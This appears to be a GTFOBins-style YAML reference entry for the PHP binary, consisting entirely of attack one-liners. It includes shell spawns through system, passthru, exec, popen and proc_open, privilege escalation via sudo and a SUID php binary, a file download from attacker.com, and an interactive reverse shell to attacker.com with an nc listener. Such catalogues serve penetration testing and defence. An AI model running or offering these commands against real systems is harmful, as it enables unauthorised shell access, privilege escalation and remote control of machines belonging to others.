--- functions: execute-interactive: - code: | export CMD="/bin/sh" php -r 'system(getenv("CMD"));' - code: | export CMD="/bin/sh" php -r 'passthru(getenv("CMD"));' - code: | export CMD="/bin/sh" php -r 'print(shell_exec(getenv("CMD")));' - code: | export CMD="/bin/sh" php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));' - code: | export CMD="/bin/sh" php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' execute-non-interactive: - code: | export CMD="id" php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' sudo-enabled: - code: | CMD="/bin/sh" sudo php -r "system('$CMD');" suid-enabled: - code: | CMD="/bin/sh" ./php -r "system('$CMD');" upload: - description: Serve files in the local folder running an HTTP server. code: | LHOST= LPORT=8888 php -S $LHOST:$LPORT download: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' reverse-shell-interactive: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' ---